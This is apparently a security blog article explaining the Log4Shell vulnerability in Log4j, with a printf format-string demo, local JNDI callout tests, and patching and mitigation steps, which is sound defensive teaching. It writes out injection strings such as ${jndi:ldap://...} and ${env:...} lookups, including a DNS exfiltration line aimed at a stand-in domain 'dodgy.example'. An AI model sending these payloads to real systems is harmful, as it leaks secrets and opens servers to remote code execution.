Log4Shell explained – how it works, why you need to know, and how to fix it

by
Paul Ducklin

In this article, we explain the Apache Log4Shell vulnerability in plain English, and give you some simple educational code that you can use safely and easily at home (or even directly on your own servers) in order to learn more.

Just to be clear up front: we’re not going to show you how to build a working exploit, or how set up the services you need in the cloud to deliver active payloads.

Instead, you you will learn:

How vulnerabilities like this end up in software.
How the Log4Shell vulnerability works.
The various ways it can be abused.
How to use Apache’s suggested mitigations.
How to test your mitigations for effectiveness.
Where to go from here.

1. Improper input validation

The primary cause of Log4Shell, formally known as CVE-2021-44228, is what NIST calls improper input validation.

Loosely speaking, this means that you place too much trust in untrusted data that arrives from outsiders, and open up your softare to sneaky tricks based on booby-trapped data.

If you’ve ever programmed in C, you’ll almost certainly have bumped into this sort of problem when using the printf() function (format string and print).

Normally, you use it something like this:

  int  printf(const char *format, ...);

  int  count; 
  char *name;

  /* print them out somewhat safely */

  print("The name %.20s appeared %d timesn",name,count);

You provide a hard-coded format string as the first argument, where %.20s means “print the next argument as a text string, but give up after 20 bytes just in case”, and %d means “take an integer and print it in decimal”.

It’s tempting also to use printf() when you want to print just a single string, like this, and you often see people making this mistake in code, especially if it’s written in a hurry:

   int  printf(const char *format, ...);

   /* printfhack.c */

   int main(int argc, char **argv) {
      /* print out first command-line argument */
      printf(argv[1]);    <-- use puts() or similar instead
      return 0;
   }

In this code, the user gets not only to choose the string to be printed out, but also to control the very formatting string that decides what to print.

So if you ask this program to print hello, it will do exactly that, but if you ask it to print %X %X %X %X %X then you won’t see those characters in the output, because %X is actually a magic “format code” that tells printf() how to behave.

The special text %X means “get the next value off the program stack and print out its raw value in hexadecimal”.

So a malcontented user who can trick your little program into printing an apparently harmless string of %Xs will actually see something like this:

   C:Usersduck> printfhack.exe "%X %X %X %X %X"

   155FA30 1565940 B4E090 B4FCB0 4D110A

As it happens, the fifth and last value in the output above, sneakily sucked in from from the program stack, is the return address to which the program jumps after doing the printf()…

…so the value 0x00000000004D110A gives away where the program code is loaded into memory, and thus breaks the security provided by ASLR (address space layout randomisation).

Software should never permit untrusted users to use untrusted data to manipulate how that very data gets handled.

Otherwise, data misuse of this sort could result.

2. Log4j considered harmful

There’s a similar sort of problem in Log4j, but it’s much, much worse.

Data supplied by an untrusted outsider – data that you are merely printing out for later reference, or logging into a file – can take over the server on which you are doing the logging.

This could turn what should be a basic “print” instruction into a leak-some-secret-data-out-onto-the-internet situation, or even into a download-and-run-my-malware-at-once command.

Simply put, a log entry that you intended to make for completeness, perhaps even for legal or security reasons, could turn into a malware implantation event.

To understand why, let’s start with a really simple Java program.

You can follow along if you like by installing the current Java SE Development Kit, which was 17.0.1 at the time of writing.

We used Windows, because most of our readers have it, but this code will work fine on Linux or a Mac as well.

Save this as Gday.java:

   public class Gday {

      public static void main(String... args) {
         System.out.println("Main says, 'Hello, world.'");
         System.out.println("Main is exiting.");
      }
   }

Open a command prompt (use CMD.EXE on Windows to match our commands, not PowerShell; use your favourite shell on Linux or Mac) and make sure you can compile and run this file.

Because it contains a main() function, this file is designed to execute as a program, so you should see this when you run it with the java command:

   C:Usersduck> java Gday.java

   Main says, 'Hello, world.'
   Main is exiting.

If you’ve got this far, your Java Development Kit is installed correctly for what comes next.

Now let’s add Log4j into the mix.

You can download the previous (unpatched) and current (patched) versions from the Apache Log4j site.

You will need: apache-log4j-2.14.1-bin.zip and apache-log4j-2.15.0-bin.zip

We’ll start with the vulnerable version, 2.14.1, so extract the following two files from the relevant zipfile, and place them in the directory where you put your Gday.java file:

   ---Timestamp----  --Size---  --------File---------
   06/03/2021 22:07    300,364  log4j-api-2.14.1.jar
   06/03/2021 22:07  1,745,701  log4j-core-2.14.1.jar

Now tell Java that you want to bring these two extra modules into play by adding them to your CLASSPATH, which is the list of extra Java modules where Java looks for add-on code libraries (put a colon between the filenames on Linux or Mac, and change set to export):

   set CLASSPATH=log4j-core-2.14.1.jar;log4j-api-2.14.1.jar

(If you don’t add the Log4j JAR files to the list of known modules correctly, you will get “unknown symbol” errors when you run the code below.)

Copy your minimlist Gday.java file to TryLogger.java and modify it like this:

   import org.apache.logging.log4j.Logger;
   import org.apache.logging.log4j.LogManager;
   
   public class Gday {
      static Logger logger = LogManager.getLogger(Gday.class);
   
      public static void main(String... args) {
         System.out.println("Main says, 'Hello, world.'");
         logger.error(args[0]);
         System.out.println("Main is exiting.");
      }
   }

Now we can compile, run and pass this program a command line argument, all in one go.

We’re logging with the error() function, even though we are not really dealing with an error, because that logging level is enabled by default, so we don’t need to create a Log4j configuration file.

We’re using the first command-line argument (args[0] in Java, corresponding roughly to argv[1] in C above) as the text to log, so we can inject the logging text externally, as we did above.

If there are spaces in the text string you want to log, put it in double quotes pn Windows, or single-quotes on Linux and Mac:

   C:Usersduck> java TryLogger.java "Hello there"

   Main says, 'Hello, world.'
   18:40:46.385 [main] ERROR Gday - Hello there
   Main is exiting.

(If you don’t put an argument on the command line after the filename TryLogger.java, you will get a java.lang.ArrayIndexOutOfBoundsException, because there won’t be an args[0] string to print out.)

If you’re seeing the middle output line above, starting with a timestamp and a function name, then the Log4j Logger object you created in the program is working correctly.

3. Log4j “lookup” features

Get ready for the scary part, which is documented in some detail on the Apache Log4j site:

“Lookups” provide a way to add values to the Log4j configuration at arbitrary places.

Simply put, the user who’s supplying the data you’re planning to log gets to choose not only how it’s formatted, but even what it contains, and how that content is acquired.

If you’re logging for legal or security purposes, or even simply for completeness, you’re probably surprised to hear this.

Giving the person at the other end a say into how to log the data they submit means not only that your logs don’t always contains a faithful record of the actual data that you received, but also that they might end up containing data from elsewhere on your server that you wouldn’t normally choose to save to a logfile at all.

Lookups in Log4j are triggered not by % characters, as they were in printf() above, but by special ${....} sequences, like this:

   C:Usersduck> java TryLogger.java "${java:version}/${java:os}"

   Main says, 'Hello, world.'
   18:51:52.959 [main] ERROR Gday - Java version 17.0.1/Windows 10 10.0, architecture: amd64-64
   Main is exiting.

See what happened there?

The only character in the data you supplied that made it into the actual log output was the / (slash) in the middle; the other parts were rewritten with the details of the Java runtime that you’re using.

Even more worryingly, the person who gets to choose the text that’s logged can leak run-time process environment variables into your logfile, like this (put USER instead of USERNAME on Linux or Mac):

   C:UsersduckLOG4J> java TryLogger.java "Username is ${env:USERNAME}"

   Main says, 'Hello, world.'
   18:55:47.744 [main] ERROR Gday - Username is duck
   Main is exiting.

Given that environment variables sometimes contain temporary private data such as access tokens or session keys, and given that you would usually take care not to keep permanent records of that sort of data, there’s already a significant data leakage risk here.

For example, most web clients include an HTTP header called User-Agent, and most HTTP servers like to keep a record of which browsers came calling, to help them decide which ones to support in future.

An attacker who deliberately sent over a User-Agent string such as ${env:TEMPORARY_SESSION_TOKEN} instead of, say, Microsoft Edge, could cause compliance headaches by tricking your server into saving to disk a data string that was only ever supposed to be stored in memory.

4. Remote lookups possible

There’s more.

Thanks to a feature of the Java runtime called JNDI, short for Java Naming and Directory Interface, Log4j “lookup” commands wrapped in ${...} sequences can not only do simple string replacements, but also do live runtime lookups to arbitary servers, both inside and outside your network.

To see this in action, we need a program that will listen out for TCP connections and report when it gets one, so we can see whether Log4j really is making network connections.

We will use ncat from the free and popular Nmap toolkit; your Linux your distro may already have ncat installed (try it and see), but for Windows you will need to install it from the official Nmap site.

We used version 7.92, which was current at the time of writing.

We’ll keep everything local, referring to the server 127.0.0.1 (or you can use the name localhost, which refers to the same thing), the very computer you are on at the moment:

   C:UsersduckLOG4J> ncat -k -vv -c "echo ---CONNECTION [%NCAT_REMOTE_PORT%]--- 1>&2" -l 8888

   Ncat: Version 7.92 ( https://nmap.org/ncat )
   Ncat: Listening on :::8888
   Ncat: Listening on 0.0.0.0:8888
   [. . .program waits here. . .]

To explain the ncat command-line options:

-k means to keep listening out for connections, not to exit after the first one.
-vv means to be somewhat verbose, so we can verify that it’s listening OK.
-c specifies a command that sends a reply to the other end, which is the minimum action we need to trick Log4j so it doesn’t hang up and wait forever. The special variable %NCAT_REMOTE_PORT% (use $NCAT_REMOTE_PORT on Linux and Mac) will be different each time so that we can easily see when new requests come in.
-l means to act as a TCP server, by listening on port 8888.

Now try this in your other command window:

   C:Usersduck> java TryLogger.java ${jndi:ldap://127.0.0.1:8888/blah}

   Main says, 'Hello, world.'
   19:17:21.876 [main] ERROR Gday - ${jndi:ldap://127.0.0.1:8888/blah}
   Main is exiting.

Even though your command-line argument was echoed precisely in the output, as though no lookup or substitution took place, and as if there were no shenanigans afoot, you should see something curious like this in the ncat window:

   Ncat: Connection from 127.0.0.1.
   Ncat: Connection from 127.0.0.1:50326.
   NCAT DEBUG: Executing: C:Windowssystem32cmd.exe /C echo ---CONNECTION [%NCAT_REMOTE_PORT%]--- 1>&2
   ---CONNECTION [50326]---

This means we’ve tricked our innocent Java progam into making a network connection (we could have used an external servername, thus heading out anywhere on the internet), and reading in yet more arbitary, untrusted data to use in the logging code.

In this case, we deliberately sent back the text string ---CONNECTION [50326]---, which is enough to complete the JNDI lookup, but isn’t legal JNDI data, so our Java program thankfully ignores it and logs the original, unsubtituted data instead. (This makes the test safe to do at home, because there isn’t any remote code execution.)

But in a real-world attack, cybercriminals who knows the right data format to use (we will not show it here, but JNDI is officially documented) could not just send back data for you to use, but even hand you a Java program that your server will then execute to generate the needed data.

You read that correctly!

An attacker who knows the right format, or who knows how to download an attack tool that can supply malicious Java code in the right format, may be able to use the Log4j Logger object as a tool to implant malware on your server, running that malicious code right inside the Java process that called the Logger function.

And there you have it: uncomplicated, reliable, by-design remote code execution (RCE), triggered by user-supplied data that may ironically be getting logged for auditing or security purposes.

5. Is your server affected?

One challenge posed by this vulnerability is to figure out which servers or servers on your network are affected.

At first glance, you might assume that you only need to consider servers with network-facing code that’s written in Java, where the incoming TCP connections that service requests are handled directly by Java software and the Java runtime libraries.

If that were so, then any services fronted by products such as Apache’s own httpd web server, Microsoft IIS, or nginx would implicitly be safe. (All those servers are primarily coded in C or C++.)

But determining both the breadth and depth of this vulnerability in all but the smallest network can be quite tricky, and Log4Shell is not restricted to servers written in 100% pure Java.

After all, it’s not the TCP-based socket handling code that is afflicted by this bug: the vulnerability could lurk anywhere in your back-end network where user-supplied data is processed and logs are kept.

A web server that logs your User-Agent string probably does so directly, so a C-based web server with a C-based logging engine is probably not at risk from booby-trapped User-Agent strings.

But many web servers take data entered into online forms, for example, and pass it on to “business logic” servers in the background that dissect it, parse it, validate it, log it, and reply to it.

If one of those business logic servers is written in Java, it could be the rotten coding apple that spoils the application barrel.

Ideally, then, you need to find any and all code in your network that is written in Java and check whether it uses the Log4j library.

Sophos has published an XDR (extended detection and response) query that will quickly identify Linux servers that have Debian-style or Red Hat-style Log4j packages installed as part of your distro, and report the version in use. This makes it easy to find servers where Log4j is available to any Java programs that want to use it, even if you didn’t knowingly install the library yourself.

Out-of-date Log4j versions need to be updated at soon as possible, even if you don’t think anyone is currently using them.

Remember, of course, that Java programs can be configured to use their own copies of any Java library, or even of Java itself, as we did when we set the CLASSPATH environment variable above.

Search right across your estate, taking in clients and servers running Linux, Mac and Windows, looking for files named log4j*.jar, or log4j-api-*.jar and log4j-core-*.jar.

Unlike executable shared libraries (such as NSS, which we wrote about recently), you don’t need to remember to search for different extensions on each platform because the JAR files we showed above are named identically on all operating systems.

Wherever possible, update any and all copies of Log4j, wherever they are found, as soon as you can.

6. Does the patch work?

You can prove to yourself that the 2.15.0 version suppresses this hole on your systems, at least in the simple test code we sused above, by extracting the new JAR files from the updated apache-log4j-2.15.0-bin.zip file you downloaded earlier:

Extract the following two files from the updated zipfile, and place them in the directory where you put your .java files, alongside the previous JAR versions:

   ---Timestamp----  --Size---  --------File---------
   09/12/2021 11:20    301,805  log4j-api-2.15.0.jar
   09/12/2021 11:20  1,789,769  log4j-core-2.15.0.jar

Change your CLASSPATH variable with:

   set CLASSPATH=log4j-core-2.15.0.jar;log4j-api-2.15.0.jar

Repeat the ${jndi:ldap://127.0.0.1:8888/blah} test shown above, and verify that the ncat connection log no longer shows any network traffic.

The updated version of Log4j still supports the potentially dangerous what-you-see-is-not-what-you-get system of string “lookups”, but network-based JNDI connections, whether on the same machine or reaching out to somewhere else, are no longer enabled by default.

This greatly reduces your risk, both of data exfiltration, for example by means of the ${env:SECRET_VARIABLE} trick mentioned above, and of malware infection via implanted Java code.

7. What if you can’t update?

Apache has proposed three different workarounds in case you can’t update yet; we tried them all and found them to work.

A. Run your vulnerable program under Java with an added command line option to suppress JNDI lookups, like this:

   java -Dlog4j2.formatMsgNoLookups=true TryLogger.java ${jndi:ldap://127.0.0.1:8888/try}

This sets a special system property that prevents any sort of {$jndi:...} activity from triggering a network connection, which prevents both exfiltration and remote code implantation.

B. Set an environment variable to force the same result:

   set LOG4J_FORMAT_MSG_NO_LOOKUPS=true
   java TryLogger.java ${jndi:ldap://127.0.0.1:8888/try}

C. Repackage your log4j-core-*.jar file by unzipping it, deleting the component called org/apache/logging/log4j/core/lookup/JndiLookup.class, and zipping the other files back up again.

We used the popular and free 7-Zip File Manager to do just that, which neatly automates the unzip-and-rezip process, and the modified JAR file solved the problem.

This technique is needed if you have a Log4j version earlier than 2.10.0, because the command-line and environment variable mitigations only work from version 2.10.0 onwards.

Open log4j-core*.jar file you want to patch.

Navigate to lookup directory and right-click to delete JndiLookup.class.

On Linux or Mac you can remove the offending component from the JAR file from the command line like this:

   zip -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

This works because Java Archives (.jar files) are actually just ZIP files with a specific internal layout.

8. What else could go wrong?

As we mentioned above, the primary risk of this JNDI “lookup” problem is that a well-informed criminal can not only trick your server into calling out to an untrusted external site…

…but also co-opt it into downloading and blindly executing untrusted code, thus leading to remote code execution (RCE) and malware implantation.

Strict firewall rules that prevent your server from calling out to the internet are an excellent defence-in-depth protection for CVE-2021-44228: if the server can’t make the TCP connection in the first place, it can’t download anything either.

But there is a secondary risk that some attackers are already trying, which could leak out data even if you have a restrictive firewall, by using DNS.

This trick involves the ${env:SECRET_VALUE} sequence we mentioned earlier for sneakily accessing the value of server environment variables.

Even on a non-corporate Windows desktop computer, the default list of environment variables is impressive, including:

   C:Usersduck> set

   ALLUSERSPROFILE=C:ProgramData
   APPDATA=C:UsersduckAppDataRoaming
   [. . .]
   COMPUTERNAME=LIVEDEMO
   [. . .]
   HOMEDRIVE=C:
   HOMEPATH=Usersduck
   [. . .]
   LOCALAPPDATA=C:UsersduckAppDataLocal
   [. . .]
   USERDOMAIN=LIVEDEMO
   USERDOMAIN_ROAMINGPROFILE=LIVEDEMO
   USERNAME=duck
   [. . .]

An attacker who knows that TCP requests will not get out of your network can nevertheless steal environment values and other Log4j “lookup” strings like this:

   C:UsersduckLOG4J> java TryLogger.java ${jndi:ldap://useris-${env:USERNAME}.dodgy.example/blah

   Main says, 'Hello, world.'
   21:33:35.003 [main] ERROR Gday - ${jndi:ldap://useris-${env:USERNAME}.dodgy.example/blah
   Main is exiting.

This looks innocent enough: clearly, there’s no way we can have a real server running at the right location to receive the JNDI callout in this example.

We don’t yet know the value of ${env:SECRET_VALUE} because that is, after all, the very data we are after.

But when we did this test, we had control over the DNS server for the domain dodgy.example, so our DNS server captured the Java code’s attempt to find the relevant servername online, and our DNS records therefore revealed the stolen data.

In the list below, most of the lookups came from elsewhere on our network (browsers looking for ad sites, and a running copy of Teams), but the lookups for useris-duck.dodgy.example were JNDI trying to find the data-leaking servername:

9014-->  AAAA for ads.servenobid.com
9015-->     A for e3.adpushup.com
9016-->  AAAA for e3.adpushup.com
9017-->     A for presence.teams.microsoft.com
9018-->  AAAA for presence.teams.microsoft.com
[. . .]
9104-->     A for useris-duck.dodgy.example   <--- leaked the USERNAME string "duck"
9105-->  AAAA for useris-duck.dodgy.example
9106-->     A for useris-duck.dodgy.example
9107-->  AAAA for useris-duck.dodgy.example
[. . .]
9236-->  AAAA for e.serverbid.com
9237-->     A for e.serverbid.com
9238-->     A for e.serverbid.com

In this case, we didn’t even try to resolve useris-duck.dodgy.example and make the server connection work.

We simply sent back an NXDOMAIN (server does not exist) reply and JNDI went no further – but the damage was already done, thanks to the “secret” text duck embedded in the subdomain name.

9. What to do?

IPS rules, WAF rules, firewall rules and web filtering can all help, by blocking malicious CVE-2021-44228 data from outside, and by preventing servers from connecting to unwanted or known-bad sites.

But the staggering number of ways that those dodgy ${jndi:...} exploit strings can be encoded, and the huge number of different places within network data streams that they can appear, means that the best way to help yourself, and thereby to help everyone else as well…

…is one of these two options:

Patch your own systems right now. Don’t wait for everyone else to go first.
Use one of the mitigations above if you can’t patch yet.

Be part of the solution, not part of the problem!

By the way, our personal recommendation, when the dust has settled, is to consider dropping Log4j if you can.

Remember that this bug, if you can call it that, was the result of a feature, and many aspects of that “feature” remain, leaving outsiders still in control of some of the content of your internal logs.

To paraphrase the old joke about getting lost in the backroads of the countryside, “If cybersecurity is where you want to get to, you probably shouldn’t start from here.”

LEARN HOW CYBERCRIMINALS ARE USING THIS VULNERABILITY IN THE WILD